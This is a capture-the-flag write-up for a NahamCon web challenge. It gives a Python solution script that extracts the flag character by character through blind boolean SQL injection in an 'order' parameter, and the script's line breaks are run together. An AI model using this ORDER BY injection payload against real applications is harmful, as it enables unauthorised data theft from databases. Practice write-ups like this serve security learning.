Edward has decided to get into web development, and he built this awesome application that lets you search for any metal you want. Alphonse has some reservations though, so he wants you to check it out and make sure it's legit.
Solution
import requestsimport stringfrom bs4 import BeautifulSoupurl ='http://challenge.nahamcon.com:30010/'flag ='flag{'index =6# Until we've got the whole flagwhile flag[-1]!='}':for char inlist('_'+ string.ascii_lowercase +'}'):# Charset# Post data, orderby is the SQLi (blind boolean) data ={"search":"", "order": f"(CASE WHEN (SELECT (SUBSTR(flag, {index}, 1)) from flag ) = '{char}' THEN name ELSE atomic_number END) DESC--"}
response = requests.post(url, data=data)# Extract the first value extracted = BeautifulSoup(response.text, features="lxml").td.contents[0]# If it's 116 (Livermorium) then condition is falseif extracted !='116': flag += charprint(flag) index += 1break
